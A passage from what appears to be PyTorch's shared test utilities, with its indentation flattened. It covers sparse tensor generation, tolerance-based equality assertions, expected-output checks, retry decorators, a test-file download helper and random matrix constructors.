with an incomplete sawtooth, and the right and lower
rectangular parts that will guarantee that
counts.sum() == nnz
for any combination of n_rows, n_cols, and nnz. Basically,
we'll find a maximal window in (n_rows + 1, n_cols + 1)-grid
that is able to hold a sequence of sawteeth and so-called
final correction, while the external part of the window is
filled with counts to meet the nnz contraint exactly.
"""
assert 0 <= nnz <= n_rows * n_cols
def sawteeth(n, m):
# return the total number of counts in the sequence of
# sawteeth where n and m define a window in (n_rows+1,
# n_cols+1) rectangle where the sequence of sawteeth
# perfectly fit.
M = (n_cols - m) * (n_cols - m + 1) // 2
K = (n_rows - n) % (n_cols - m + 1)
return M * ((n_rows - n) // (n_cols - m + 1)) + K * (K - 1) // 2
# Different from the original method description, here counts
# has leading 0 required by crow_indices:
counts = torch.zeros(n_rows + 1, dtype=dtype, device=torch.device('cpu'))
n = m = 0
N = sawteeth(n, m)
if N and nnz >= max(N, n_cols):
# determine the width of the sawteeth window. We use bisection to solve
# N(n, 0) == 0 or nnz - n * n_cols < max(N(n, 0), n_cols)
# for n
n_left = n
n_right = n_rows - 1
N_right = sawteeth(n_right, m)
while n_right - n_left > 1:
n_middle = (n_left + n_right) // 2
N_middle = sawteeth(n_middle, m)
if N_middle == 0 or nnz - n_middle * n_cols < max(N_middle, n_cols):
n_right, N_right = n_middle, N_middle
else:
n_left = n_middle
n, N = n_right, N_right
# fill the right rectangle with counts:
assert n
counts[-n:].fill_(n_cols)
if N and nnz - n * n_cols >= max(N, n_rows - n):
# determine the height of the sawteeth window. We use bisection to solve
# N(n, m) == 0 or nnz - n * n_cols - m * (n_rows - n) < max(N(n, m), n_rows - n)
# for m.
m_left = m
m_right = n_cols - 1
N_right = sawteeth(n, m_right)
while m_right - m_left > 1:
m_middle = (m_left + m_right) // 2
N_middle = sawteeth(n, m_middle)
if N_middle == 0 or nnz - n * n_cols - m_middle * (n_rows - n) < max(N_middle, n_rows - n):
m_right, N_right = m_middle, N_middle
else:
m_left = m_middle
m, N = m_right, N_right
# fill the bottom rectangle with counts:
assert m
counts[1:n_rows - n + 1].fill_(m)
if N:
# fill the sawteeth window with counts
q, r = divmod(nnz - n * n_cols - m * (n_rows - n),
(n_cols - m) * (n_cols - m + 1) // 2)
p = 1 + q * (n_cols - m + 1)
if sys.version_info >= (3, 8):
k = math.isqrt(2 * r)
else:
# math.isqrt(x) is available starting from Python 3.8.
# Here we use int(math.sqrt(x)) as an approximation
# that appers to give exaxt result for all x values
# less than 2**35, at least, the upper limit of x is
# TBD.
k = int(math.sqrt(2 * r))
if k * (k + 1) > 2 * r:
k -= 1
corr = r - k * (k + 1) // 2
assert not ((p > 1) and (m > 0)) # full sawteeth are never on top of a bottom rectangle
# sequence of full sawteeth:
counts[1:p] = torch.arange(p - 1, dtype=dtype, device=counts.device) % (n_cols - m + 1)
# incomplete sawtooth:
counts[p:p + k + 1] += torch.arange(k + 1, dtype=dtype, device=counts.device)
else:
# given input does not support sawteeth
p = 1
corr = nnz - n * n_cols - m * (n_rows - n)
# correction that will guarantee counts.sum() == nnz:
counts[p] += corr
if random:
# randomize crow_indices by shuffling the sawteeth
# sequence:
perm = torch.randperm(n_rows, device=counts.device)
counts[1:] = counts[1:][perm]
# compute crow_indices:
crow_indices = counts
crow_indices.cumsum_(dim=0)
return crow_indices.to(device=device)
def genSparseCSRTensor(self, size, nnz, *, device, dtype, index_dtype):
sparse_dim = 2
assert all(size[d] > 0 for d in range(sparse_dim)) or nnz == 0, 'invalid arguments'
assert len(size) == sparse_dim
def random_sparse_csr(n_rows, n_cols, nnz):
crow_indices = self._make_crow_indices(n_rows, n_cols, nnz, device=device, dtype=index_dtype)
col_indices = torch.zeros(nnz, dtype=index_dtype, device=device)
for i in range(n_rows):
count = crow_indices[i + 1] - crow_indices[i]
col_indices[crow_indices[i]:crow_indices[i + 1]], _ = torch.sort(
torch.randperm(n_cols, dtype=index_dtype, device=device)[:count])
values = make_tensor([nnz], device=device, dtype=dtype, low=-1, high=1)
return values, crow_indices, col_indices
values, crow_indices, col_indices = random_sparse_csr(size[0], size[1], nnz)
return torch.sparse_csr_tensor(crow_indices,
col_indices,
values, size=size, dtype=dtype, device=device)
def genSparseTensor(self, size, sparse_dim, nnz, is_uncoalesced, device, dtype):
# Assert not given impossible combination, where the sparse dims have
# empty numel, but nnz > 0 makes the indices containing values.
assert all(size[d] > 0 for d in range(sparse_dim)) or nnz == 0, 'invalid arguments'
v_size = [nnz] + list(size[sparse_dim:])
v = make_tensor(v_size, device=device, dtype=dtype, low=-1, high=1)
i = torch.rand(sparse_dim, nnz, device=device)
i.mul_(torch.tensor(size[:sparse_dim]).unsqueeze(1).to(i))
i = i.to(torch.long)
if is_uncoalesced:
v = torch.cat([v, torch.randn_like(v)], 0)
i = torch.cat([i, i], 1)
x = torch.sparse_coo_tensor(i, v, torch.Size(size), dtype=dtype, device=device)
if not is_uncoalesced:
x = x.coalesce()
else:
# FIXME: `x` is a sparse view of `v`. Currently rebase_history for
# sparse views is not implemented, so this workaround is
# needed for inplace operations done on `x`, e.g., copy_().
# Remove after implementing something equivalent to CopySlice
# for sparse views.
# NOTE: We do clone() after detach() here because we need to be able to change size/storage of x afterwards
x = x.detach().clone()
return x, x._indices().clone(), x._values().clone()
def safeToDense(self, t):
return t.coalesce().to_dense()
# Compares torch function with reference function for given sample input (object of SampleInput)
# Note: only values are compared, type comparison is not done here
def compare_with_reference(self, torch_fn, ref_fn, sample_input, **kwargs):
n_inp, n_args, n_kwargs = sample_input.numpy()
t_inp, t_args, t_kwargs = sample_input.input, sample_input.args, sample_input.kwargs
actual = torch_fn(t_inp, *t_args, **t_kwargs)
expected = ref_fn(n_inp, *n_args, **n_kwargs)
self.assertEqual(actual, expected, exact_device=False)
# Compares the given Torch and NumPy functions on the given tensor-like object.
# NOTE: both torch_fn and np_fn should be functions that take a single
# tensor (array). If the torch and/or NumPy function require additional
# arguments then wrap the function in a lambda or pass a partial function.
# TODO: add args/kwargs for passing to assertEqual (e.g. rtol, atol)
def compare_with_numpy(self, torch_fn, np_fn, tensor_like,
device=None, dtype=None, **kwargs):
assert TEST_NUMPY
if isinstance(tensor_like, torch.Tensor):
assert device is None
assert dtype is None
t_cpu = tensor_like.detach().cpu()
if t_cpu.dtype is torch.bfloat16:
t_cpu = t_cpu.float()
a = t_cpu.numpy()
t = tensor_like
else:
d = copy.copy(torch_to_numpy_dtype_dict)
d[torch.bfloat16] = np.float32
a = np.array(tensor_like, dtype=d[dtype])
t = torch.tensor(tensor_like, device=device, dtype=dtype)
np_result = np_fn(a)
torch_result = torch_fn(t).cpu()
# Converts arrays to tensors
if isinstance(np_result, np.ndarray):
try:
np_result = torch.from_numpy(np_result)
except Exception:
# NOTE: copying an array before conversion is necessary when,
# for example, the array has negative strides.
np_result = torch.from_numpy(np_result.copy())
if t.dtype is torch.bfloat16 and torch_result.dtype is torch.bfloat16 and np_result.dtype is torch.float:
torch_result = torch_result.to(torch.float)
self.assertEqual(np_result, torch_result, **kwargs)
# Some analysis of tolerance by logging tests from test_torch.py can be found
# in https://github.com/pytorch/pytorch/pull/32538.
# dtype name : (rtol, atol)
dtype_precisions = {
torch.float16 : (0.001, 1e-5),
torch.bfloat16 : (0.016, 1e-5),
torch.float32 : (1.3e-6, 1e-5),
torch.float64 : (1e-7, 1e-7),
torch.complex32 : (0.001, 1e-5),
torch.complex64 : (1.3e-6, 1e-5),
torch.complex128 : (1e-7, 1e-7),
}
# Returns the "default" rtol and atol for comparing scalars or
# tensors of the given dtypes.
def _getDefaultRtolAndAtol(self, dtype0, dtype1):
rtol = max(self.dtype_precisions.get(dtype0, (0, 0))[0],
self.dtype_precisions.get(dtype1, (0, 0))[0])
atol = max(self.dtype_precisions.get(dtype0, (0, 0))[1],
self.dtype_precisions.get(dtype1, (0, 0))[1])
return rtol, atol
# Checks if two dense tensors are equal(-ish), returning (True, None)
# when they are and (False, debug_msg) when they are not.
# If exact_dtype is true both tensors must have the same dtype.
# If exact_device is true both tensors must be on the same device.
# See the "Test Framework Tensor 'Equality'" note for more details.
# NOTE: tensors on different devices are moved to the CPU to be compared when
# exact_device is False.
# NOTE: this function checks the tensors' devices, sizes, and dtypes
# and acquires the appropriate device, dtype, rtol and atol to compare
# them with. It then calls _compare_tensors_internal.
def _compareTensors(self, a, b, *, rtol: Optional[float] = None, atol=None, equal_nan=True,
exact_dtype=True, exact_device=False) -> _compare_return_type:
assert (atol is None) == (rtol is None)
if not isinstance(a, torch.Tensor):
return (False, "argument a, {0}, to _compareTensors is not a tensor!".format(a))
if not isinstance(b, torch.Tensor):
return (False, "argument b, {0}, to _compareTensors is not a tensor!".format(b))
# Validates tensors are on the same device
if exact_device and a.device != b.device:
return (False, ("Attempted to compare equality of tensors on "
"different devices! Got devices {0} and "
"{1}.".format(a.device, b.device)))
# Compares tensors of different devices on the CPU
if a.device != b.device:
a = a.cpu()
b = b.cpu()
# Checks size matches
if a.size() != b.size():
return (False, ("Attempted to compare equality of tensors with "
"different sizes. Got sizes {0} and {1}.").format(a.size(), b.size()))
# Checks dtype (if exact_dtype)
if exact_dtype and a.dtype is not b.dtype:
return (False, ("Attempted to compare equality of tensors with "
"different dtypes. Got dtypes {0} and {1}.").format(a.dtype, b.dtype))
# Acquires rtol and atol
if rtol is None:
rtol, atol = self._getDefaultRtolAndAtol(a.dtype, b.dtype)
atol = max(atol, self.precision)
rtol = max(rtol, self.rel_tol)
# Converts to comparison dtype
dtype = get_comparison_dtype(a, b)
a = a.to(dtype)
b = b.to(dtype)
return _compare_tensors_internal(a, b, rtol=rtol, atol=atol, equal_nan=equal_nan)
# Checks if two scalars are equal(-ish), returning (True, None)
# when they are and (False, debug_msg) when they are not.
# NOTE: this function just acquires rtol and atol
# before calling _compare_scalars_internal.
def _compareScalars(self, a, b, *,
rtol: Optional[float] = None, atol: Optional[float] = None, equal_nan=True) -> _compare_return_type:
# Acquires rtol and atol
assert (atol is None) == (rtol is None)
if rtol is None:
if isinstance(a, complex) or isinstance(b, complex):
rtol, atol = self._getDefaultRtolAndAtol(torch.complex64, torch.complex64)
elif isinstance(a, float) or isinstance(b, float):
rtol, atol = self._getDefaultRtolAndAtol(torch.float32, torch.float32)
else:
rtol, atol = 0, 0
rtol = cast(float, rtol)
atol = cast(float, atol)
assert atol is not None
atol = max(atol, self.precision)
rtol = max(rtol, self.rel_tol)
return _compare_scalars_internal(a, b, rtol=rtol, atol=atol, equal_nan=equal_nan)
# Construct assert messages basd on internal debug message and user provided message.
def _get_assert_msg(self, msg, debug_msg=None):
if msg is None:
return debug_msg
else:
return f"\n{msg}" if debug_msg is None else f"{debug_msg}\n{msg}"
def assertEqualIgnoreType(self, *args, **kwargs) -> None:
# If you are seeing this function used, that means test is written wrongly
# and deserves detailed investigation
return self.assertEqual(*args, exact_dtype=False, **kwargs)
def _is_dict(self, obj):
return isinstance(obj, (dict, torch._C.ScriptDict)) # type: ignore[attr-defined]
# Compares x and y
# TODO: default exact_device to True
def assertEqual(self, x, y, msg: Optional[str] = None, *,
atol: Optional[float] = None, rtol: Optional[float] = None,
equal_nan=True, exact_dtype=True, exact_device=False) -> None:
assert (atol is None) == (rtol is None), "If one of atol or rtol is specified, then the other must be too"
debug_msg: Optional[str] = None
# Tensor x Number and Number x Tensor comparisons
if isinstance(x, torch.Tensor) and isinstance(y, Number):
self.assertEqual(x.item(), y, atol=atol, rtol=rtol, msg=msg,
exact_dtype=exact_dtype, exact_device=exact_device)
elif isinstance(y, torch.Tensor) and isinstance(x, Number):
self.assertEqual(x, y.item(), atol=atol, rtol=rtol, msg=msg,
exact_dtype=exact_dtype, exact_device=exact_device)
# Tensor x np.bool
elif isinstance(x, torch.Tensor) and isinstance(y, np.bool_):
self.assertEqual(x.item(), y, atol=atol, rtol=rtol, msg=msg,
exact_dtype=exact_dtype, exact_device=exact_device)
elif isinstance(y, torch.Tensor) and isinstance(x, np.bool_):
self.assertEqual(x, y.item(), atol=atol, rtol=rtol, msg=msg,
exact_dtype=exact_dtype, exact_device=exact_device)
# Tensor x Tensor
elif isinstance(x, torch.Tensor) and isinstance(y, torch.Tensor):
debug_msg = ("Attempted to compare with different is_sparse settings: "
f"Expected: {x.is_sparse}; Actual: {y.is_sparse}.")
super().assertEqual(x.is_sparse, y.is_sparse, msg=self._get_assert_msg(msg=msg, debug_msg=debug_msg))
debug_msg = ("Attempted to compare with different is_quantized settings: "
f"Expected: {x.is_quantized}; Actual: {y.is_quantized}.")
super().assertEqual(x.is_quantized, y.is_quantized, msg=self._get_assert_msg(msg=msg, debug_msg=debug_msg))
if x.is_sparse:
if x.size() != y.size():
debug_msg_sparse = ("Attempted to compare equality of tensors with different sizes: "
f"Expected: {x.size()}; Actual: {y.size()}.")
super().assertTrue(False, msg=self._get_assert_msg(msg=msg, debug_msg=debug_msg_sparse))
x = x.coalesce()
y = y.coalesce()
indices_result, debug_msg_indices = self._compareTensors(x._indices(), y._indices(),
rtol=rtol, atol=atol,
equal_nan=equal_nan, exact_dtype=exact_dtype,
exact_device=exact_device)
if not indices_result:
assert debug_msg_indices is not None
debug_msg = "Sparse tensor indices failed to compare as equal! " + debug_msg_indices
super().assertTrue(indices_result, msg=self._get_assert_msg(msg, debug_msg=debug_msg))
values_result, debug_msg_values = self._compareTensors(x._values(), y._values(),
rtol=rtol, atol=atol,
equal_nan=equal_nan, exact_dtype=exact_dtype,
exact_device=exact_device)
if not values_result:
assert debug_msg_values is not None
debug_msg = "Sparse tensor values failed to compare as equal! " + debug_msg_values
super().assertTrue(values_result, msg=self._get_assert_msg(msg, debug_msg=debug_msg))
elif x.is_quantized and y.is_quantized:
self.assertEqual(x.qscheme(), y.qscheme(), atol=atol, rtol=rtol,
msg=msg, exact_dtype=exact_dtype,
exact_device=exact_device)
if x.qscheme() == torch.per_tensor_affine:
self.assertEqual(x.q_scale(), y.q_scale(), atol=atol, rtol=rtol,
msg=msg, exact_dtype=exact_dtype,
exact_device=exact_device)
self.assertEqual(x.q_zero_point(), y.q_zero_point(),
atol=atol, rtol=rtol, msg=msg,
exact_dtype=exact_dtype, exact_device=exact_device)
elif x.qscheme() == torch.per_channel_affine:
self.assertEqual(x.q_per_channel_scales(), y.q_per_channel_scales(), atol=atol, rtol=rtol,
msg=msg, exact_dtype=exact_dtype,
exact_device=exact_device)
self.assertEqual(x.q_per_channel_zero_points(), y.q_per_channel_zero_points(),
atol=atol, rtol=rtol, msg=msg,
exact_dtype=exact_dtype, exact_device=exact_device)
self.assertEqual(x.q_per_channel_axis(), y.q_per_channel_axis(),
atol=atol, rtol=rtol, msg=msg,
exact_dtype=exact_dtype, exact_device=exact_device)
result, debug_msg_compare = self._compareTensors(x.int_repr().to(torch.int32),
y.int_repr().to(torch.int32),
atol=atol, rtol=rtol,
exact_dtype=exact_dtype,
exact_device=exact_device)
if not result:
assert debug_msg_compare is not None
debug_msg = "Quantized representations failed to compare as equal! " + debug_msg_compare
super().assertTrue(result, msg=self._get_assert_msg(msg, debug_msg=debug_msg))
else:
result, debug_msg_generic = self._compareTensors(x, y, rtol=rtol, atol=atol,
equal_nan=equal_nan, exact_dtype=exact_dtype,
exact_device=exact_device)
if not result:
assert debug_msg_generic is not None
debug_msg = "Tensors failed to compare as equal!" + debug_msg_generic
super().assertTrue(result, msg=self._get_assert_msg(msg, debug_msg=debug_msg))
elif isinstance(x, (np.ndarray, torch.Tensor)) or isinstance(y, (np.ndarray, torch.Tensor)):
def maybe_to_tensor(a: Union[np.ndarray, torch.Tensor]) -> Union[np.ndarray, torch.Tensor]:
if not isinstance(a, np.ndarray):
return a
try:
return torch.from_numpy(a)
except TypeError:
# This happens if the dtype is non-numeric or not supported by torch
return a
def maybe_to_list(a: Any) -> Any:
if not isinstance(a, (np.ndarray, torch.Tensor)):
return a
return a.tolist()
x = maybe_to_tensor(x)
y = maybe_to_tensor(y)
if isinstance(x, torch.Tensor) and isinstance(y, torch.Tensor):
self.assertEqual(
x, y, atol=atol, rtol=rtol, msg=msg, exact_dtype=exact_dtype, exact_device=exact_device
)
else:
# In case we can't convert the array to a tensor, we fall back to comparing x and y as iterables
self.assertEqual(
maybe_to_list(x),
maybe_to_list(y),
atol=atol,
rtol=rtol,
msg=msg,
exact_dtype=exact_dtype,
exact_device=exact_device
)
elif isinstance(x, string_classes) and isinstance(y, string_classes):
debug_msg = ("Attempted to compare [string] types: "
f"Expected: {repr(x)}; Actual: {repr(y)}.")
super().assertEqual(x, y, msg=self._get_assert_msg(msg, debug_msg=debug_msg))
elif type(x) == set and type(y) == set:
debug_msg = ("Attempted to compare [set] types: "
f"Expected: {x}; Actual: {y}.")
super().assertEqual(x, y, msg=self._get_assert_msg(msg, debug_msg=debug_msg))
elif self._is_dict(x) and self._is_dict(y):
if isinstance(x, OrderedDict) and isinstance(y, OrderedDict):
self.assertEqual(x.items(), y.items(), atol=atol, rtol=rtol,
msg=msg, exact_dtype=exact_dtype,
exact_device=exact_device)
else:
self.assertEqual(set(x.keys()), set(y.keys()), atol=atol, rtol=rtol,
msg=msg, exact_dtype=exact_dtype,
exact_device=exact_device)
key_list = list(x.keys())
self.assertEqual([x[k] for k in key_list],
[y[k] for k in key_list],
atol=atol, rtol=rtol, msg=msg,
exact_dtype=exact_dtype, exact_device=exact_device)
elif isinstance(x, type) and isinstance(y, type):
# See TestTorch.test_assert_equal_generic_meta
debug_msg = ("Attempted to compare [type] types: "
f"Expected: {x}; Actual: {y}.")
super().assertEqual(x, y, msg=self._get_assert_msg(msg, debug_msg=debug_msg))
elif is_iterable(x) and is_iterable(y):
debug_msg = ("Attempted to compare the lengths of [iterable] types: "
f"Expected: {len(x)}; Actual: {len(y)}.")
super().assertEqual(len(x), len(y), msg=self._get_assert_msg(msg, debug_msg=debug_msg))
for x_, y_ in zip(x, y):
self.assertEqual(x_, y_, atol=atol, rtol=rtol, msg=msg,
exact_dtype=exact_dtype, exact_device=exact_device)
elif isinstance(x, bool) and isinstance(y, bool):
super().assertTrue(x == y, msg=msg)
# Scalar x Scalar
elif isinstance(x, Number) and isinstance(y, Number):
result, debug_msg_scalars = self._compareScalars(x, y, rtol=rtol, atol=atol,
equal_nan=equal_nan)
if not result:
assert debug_msg_scalars is not None
debug_msg = "Scalars failed to compare as equal! " + debug_msg_scalars
super().assertTrue(result, msg=self._get_assert_msg(msg, debug_msg=debug_msg))
else:
super().assertEqual(x, y, msg=msg)
def assertNotEqual(self, x, y, msg: Optional[str] = None, *, # type: ignore[override]
atol: Optional[float] = None, rtol: Optional[float] = None, **kwargs) -> None:
with self.assertRaises(AssertionError, msg=msg):
self.assertEqual(x, y, msg, atol=atol, rtol=rtol, **kwargs)
def assertEqualTypeString(self, x, y) -> None:
# This API is used simulate deprecated x.type() == y.type()
self.assertEqual(x.device, y.device)
self.assertEqual(x.dtype, y.dtype)
self.assertEqual(x.is_sparse, y.is_sparse)
def assertObjectIn(self, obj: Any, iterable: Iterable[Any]) -> None:
for elem in iterable:
if id(obj) == id(elem):
return
raise AssertionError("object not found in iterable")
# Reimplemented to provide special behavior when
# _ignore_not_implemented_error is True
def assertRaises(self, expected_exception, *args, **kwargs):
if self._ignore_not_implemented_error:
context: Optional[AssertRaisesContextIgnoreNotImplementedError] = \
AssertRaisesContextIgnoreNotImplementedError(expected_exception, self) # type: ignore[call-arg]
try:
return context.handle('assertRaises', args, kwargs) # type: ignore[union-attr]
finally:
# see https://bugs.python.org/issue23890
context = None
else:
return super().assertRaises(expected_exception, *args, **kwargs)
# Reimplemented to provide special behavior when
# _ignore_not_implemented_error is True
def assertRaisesRegex(self, expected_exception, expected_regex, *args, **kwargs):
if self._ignore_not_implemented_error:
context = AssertRaisesContextIgnoreNotImplementedError( # type: ignore[call-arg]
expected_exception, self, expected_regex)
return context.handle('assertRaisesRegex', args, kwargs) # type: ignore[attr-defined]
else:
return super().assertRaisesRegex(expected_exception, expected_regex, *args, **kwargs)
# TODO: Support context manager interface
# NB: The kwargs forwarding to callable robs the 'subname' parameter.
# If you need it, manually apply your callable in a lambda instead.
def assertExpectedRaises(self, exc_type, callable, *args, **kwargs):
subname = None
if 'subname' in kwargs:
subname = kwargs['subname']
del kwargs['subname']
try:
callable(*args, **kwargs)
except exc_type as e:
self.assertExpected(str(e), subname)
return
# Don't put this in the try block; the AssertionError will catch it
self.fail(msg="Did not raise when expected to")
def assertNotWarn(self, callable, msg=''):
r"""
Test if :attr:`callable` does not raise a warning.
"""
with warnings.catch_warnings(record=True) as ws:
warnings.simplefilter("always") # allow any warning to be raised
with set_warn_always_context(True):
callable()
self.assertTrue(len(ws) == 0, msg)
@contextmanager
def assertWarnsOnceRegex(self, category, regex=''):
"""Context manager for code that *must always* warn
This filters expected warnings from the test and fails if
the expected warning is not caught. It uses set_warn_always() to force
TORCH_WARN_ONCE to behave like TORCH_WARN
"""
pattern = re.compile(regex)
with warnings.catch_warnings(record=True) as ws:
warnings.simplefilter("always") # allow any warning to be raised
with set_warn_always_context(True):
yield
if len(ws) == 0:
self.fail('no warning caught')
self.assertTrue(any([type(w.message) is category for w in ws]))
self.assertTrue(
any([re.match(pattern, str(w.message)) for w in ws]),
f'{pattern}, {[w.message for w in ws if type(w.message) is category]}')
def assertExpected(self, s, subname=None):
r"""
Test that a string matches the recorded contents of a file
derived from the name of this test and subname. This file
is placed in the 'expect' directory in the same directory
as the test script. You can automatically update the recorded test
output using --accept.
If you call this multiple times in a single function, you must
give a unique subname each time.
"""
if not isinstance(s, str):
raise TypeError("assertExpected is strings only")
def remove_prefix(text, prefix):
if text.startswith(prefix):
return text[len(prefix):]
return text
# NB: we take __file__ from the module that defined the test
# class, so we place the expect directory where the test script
# lives, NOT where test/common_utils.py lives. This doesn't matter in
# PyTorch where all test scripts are in the same directory as
# test/common_utils.py, but it matters in onnx-pytorch
module_id = self.__class__.__module__
munged_id = remove_prefix(self.id(), module_id + ".")
test_file = os.path.realpath(sys.modules[module_id].__file__)
expected_file = os.path.join(os.path.dirname(test_file),
"expect",
munged_id)
subname_output = ""
if subname:
expected_file += "-" + subname
subname_output = " ({})".format(subname)
expected_file += ".expect"
expected = None
def accept_output(update_type):
print("Accepting {} for {}{}:\n\n{}".format(update_type, munged_id, subname_output, s))
with open(expected_file, 'w') as f:
# Adjust for producer_version, leave s unmodified
s_tag = re.sub(r'(producer_version): "[0-9.]*"',
r'\1producer_version: "CURRENT_VERSION"', s)
f.write(s_tag)
try:
with open(expected_file) as f:
expected = f.read()
except IOError as e:
if e.errno != errno.ENOENT:
raise
elif expecttest.ACCEPT:
return accept_output("output")
else:
raise RuntimeError(
("I got this output for {}{}:\n\n{}\n\n"
"No expect file exists; to accept the current output, run:\n"
"python {} {} --accept").format(munged_id, subname_output, s, __main__.__file__, munged_id)) from None
# a hack for JIT tests
if IS_WINDOWS:
expected = re.sub(r'CppOp\[(.+?)\]', 'CppOp[]', expected)
s = re.sub(r'CppOp\[(.+?)\]', 'CppOp[]', s)
# Adjust for producer_version
expected = expected.replace(
'producer_version: "CURRENT_VERSION"',
'producer_version: "{}"'.format(torch.onnx.producer_version)
)
if expecttest.ACCEPT:
if expected != s:
return accept_output("updated output")
else:
if hasattr(self, "assertMultiLineEqual"):
# Python 2.7 only
# NB: Python considers lhs "old" and rhs "new".
self.assertMultiLineEqual(expected, s)
else:
self.assertEqual(s, expected)
def assertExpectedStripMangled(self, s, subname=None):
s = re.sub(r'__torch__[^ ]+', '', s)
self.assertExpected(s, subname)
def assertGreaterAlmostEqual(self, first, second, places=None, msg=None, delta=None):
"""Assert that ``first`` is greater than or almost equal to ``second``.
The equality of ``first`` and ``second`` is determined in a similar way to
the ``assertAlmostEqual`` function of the standard library.
"""
if delta is not None and places is not None:
raise TypeError("specify delta or places not both")
if first >= second:
return
diff = second - first
if delta is not None:
if diff <= delta:
return
standardMsg = f"{first} not greater than or equal to {second} within {delta} delta"
else:
if places is None:
places = 7
if round(diff, places) == 0:
return
standardMsg = f"{first} not greater than or equal to {second} within {places} places"
msg = self._formatMessage(msg, standardMsg)
raise self.failureException(msg)
# run code in subprocess and capture exceptions.
@staticmethod
def run_process_no_exception(code, env=None):
import subprocess
popen = subprocess.Popen(
[sys.executable, '-c', code],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
env=env)
(stdout, stderr) = popen.communicate()
return (stdout, stderr)
# returns captured stderr
@staticmethod
def runWithPytorchAPIUsageStderr(code):
env = os.environ.copy()
env["PYTORCH_API_USAGE_STDERR"] = "1"
# remove IN_CI flag since this is a wrapped test process.
# IN_CI flag should be set in the parent process only.
if "IN_CI" in env.keys():
del env["IN_CI"]
(stdout, stderr) = TestCase.run_process_no_exception(code, env=env)
return stderr.decode('ascii')
def download_file(url, binary=True):
from urllib.parse import urlsplit
from urllib import request, error
filename = os.path.basename(urlsplit(url)[2])
data_dir = get_writable_path(os.path.join(os.path.dirname(__file__), 'data'))
path = os.path.join(data_dir, filename)
if os.path.exists(path):
return path
try:
data = request.urlopen(url, timeout=15).read()
with open(path, 'wb' if binary else 'w') as f:
f.write(data)
return path
except error.URLError as e:
msg = "could not download test file '{}'".format(url)
warnings.warn(msg, RuntimeWarning)
raise unittest.SkipTest(msg) from e
def find_free_port():
with closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as sock:
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind(('localhost', 0))
_, port = sock.getsockname()
return port
# Errors that we can get in c10d initialization for which we should retry tests for.
ADDRESS_IN_USE = "Address already in use"
CONNECT_TIMEOUT = "connect() timed out."
def retry_on_connect_failures(func=None, connect_errors=(ADDRESS_IN_USE)):
"""Reruns a test if the test returns a RuntimeError and the exception
matches exactly with one of the strings in connect_errors."""
# This if block is executed when using this function as a decorator with arguments.
if func is None:
return partial(retry_on_connect_failures, connect_errors=connect_errors)
@wraps(func)
def wrapper(*args, **kwargs):
tries_remaining = 10
while True:
try:
return func(*args, **kwargs)
except RuntimeError as error:
if str(error) in connect_errors:
tries_remaining -= 1
if tries_remaining == 0:
raise
time.sleep(random.random())
continue
raise
return wrapper
# Decorator to retry upon certain Exceptions.
def retry(ExceptionToCheck, tries=3, delay=3, skip_after_retries=False):
def deco_retry(f):
@wraps(f)
def f_retry(*args, **kwargs):
mtries, mdelay = tries, delay
while mtries > 1:
try:
return f(*args, **kwargs)
except ExceptionToCheck as e:
msg = "%s, Retrying in %d seconds..." % (str(e), mdelay)
print(msg)
time.sleep(mdelay)
mtries -= 1
try:
return f(*args, **kwargs)
except ExceptionToCheck as e:
raise unittest.SkipTest(f"Skipping after {tries} consecutive {str(e)}") from e if skip_after_retries else e
return f_retry # true decorator
return deco_retry
# Methods for matrix generation
def random_square_matrix_of_rank(l, rank, dtype=torch.double, device='cpu'):
assert rank <= l
A = torch.randn(l, l, dtype=dtype, device=device)
u, s, vh = torch.linalg.svd(A, full_matrices=False)
for i in range(l):
if i >= rank:
s[i] = 0
elif s[i] == 0:
s[i] = 1
return (u * s.to(dtype).unsqueeze(-2)) @ vh
def random_well_conditioned_matrix(*shape, dtype, device, mean=1.0, sigma=0.001):
"""
Returns a random rectangular matrix (batch of matrices)
with singular values sampled from a Gaussian with
mean `mean` and standard deviation `sigma`.
The smaller the `sigma`, the better conditioned
the output matrix is.
"""
primitive_dtype = {
torch.float: torch.float,
torch.double: torch.double,
torch.cfloat: torch.float,
torch.cdouble: torch.double
}
x = torch.rand(shape, dtype=dtype, device=device)
m = x.size(-2)
n = x.size(-1)
u, _, vh = torch.linalg.svd(x, full_matrices=False)
s = (torch.randn(*(shape[:-2] + (min(m, n),)), dtype=primitive_dtype[dtype], device=device) * sigma + mean) \
.sort(-1, descending=True).values.to(dtype)
return (u * s.unsqueeze(-2)) @ vh
# TODO: remove this (prefer make_symmetric_matrices below)
def random_symmetric_matrix(l, *batches, **kwargs):
dtype = kwargs.get('dtype', torch.double)
device = kwargs.get('device', 'cpu')
A = torch.randn(*(batches + (l, l)), dtype=dtype, device=device)
A = (A + A.transpose(-2, -1)).div_(2)
return A
# Creates a symmetric matrix or batch of symmetric matrices
# Shape must be a square matrix or batch of square matrices
def make_symmetric_matrices(*shape, device, dtype):
assert shape[-1] == shape[-2]
t = make_tensor(shape, device=device, dtype=dtype)
t = t + t.transpose(-2, -1).div_(2)
return t
def random_hermitian_matrix(l, *batches, **kwargs):
dtype = kwargs.get('dtype', torch.double)
device = kwargs.get('device', 'cpu')
A = torch.randn(*(batches + (l, l)), dtype=dtype, device=device)
A = (A + A.transpose(-2, -1).conj()).div_(2)
return A
def random_symmetric_psd_matrix(l, *batches, **kwargs):
dtype = kwargs.get('dtype', torch.double)
device = kwargs.get('device', 'cpu')
A = torch.randn(*(batches + (l, l)), dtype=dtype, device=device)
return torch.matmul(A, A.transpose(-2, -1))
def random_hermitian_psd_matrix(matrix_size, *batch_dims, dtype=torch.double, device='cpu'):
"""
Returns a batch of random Hermitian semi-positive-definite matrices.
The shape of the result is batch_dims + (matrix_size, matrix_size)
The following example creates a tensor of size 2 x 4 x 3 x 3
>>> matrices = random_hermitian_psd_matrix(3, 2, 4, dtype=dtype, device=device)
"""
A = torch.randn(*(batch_dims + (matrix_size, matrix_size)), dtype=dtype, device=device)
return torch.matmul(A, A.conj().transpose(-2, -1))
# TODO: remove this (prefer make_symmetric_pd_matrices below)
def random_symmetric_pd_matrix(matrix_size, *batch_dims, **kwargs):
dtype = kwargs.get('dtype', torch.double)
device = kwargs.get('device', 'cpu')
A = torch.randn(*(batch_dims + (matrix_size, matrix_size)),
dtype=dtype, device=device)
return torch.matmul(A, A.transpose(-2, -1)) \
+ torch.eye(matrix_size, dtype=dtype, device=device) * 1e-5
# Creates a symmetric positive-definite matrix or batch of
# such matrices
def make_symmetric_pd_matrices(*shape, device, dtype):
